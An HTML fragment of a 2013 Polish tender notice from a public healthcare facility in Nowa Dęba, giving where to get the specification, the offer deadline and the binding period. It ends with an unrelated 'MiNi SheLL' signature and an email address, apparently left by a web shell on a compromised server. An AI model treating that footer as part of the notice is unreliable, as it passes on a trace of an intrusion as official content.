<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej 39-460 Nowa Dęba, ul.M.C.Skłodowskiej 1A,Osob.pok.nr 11;za zaliczeniem poczt.przesyłając wniosek z adresem i nr NIP.Cena SIWZ 20,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2013 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej 39-460 Nowa Dęba, ul.M.C.Skłodowskiej 1A - Sekretariat pokój nr 104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com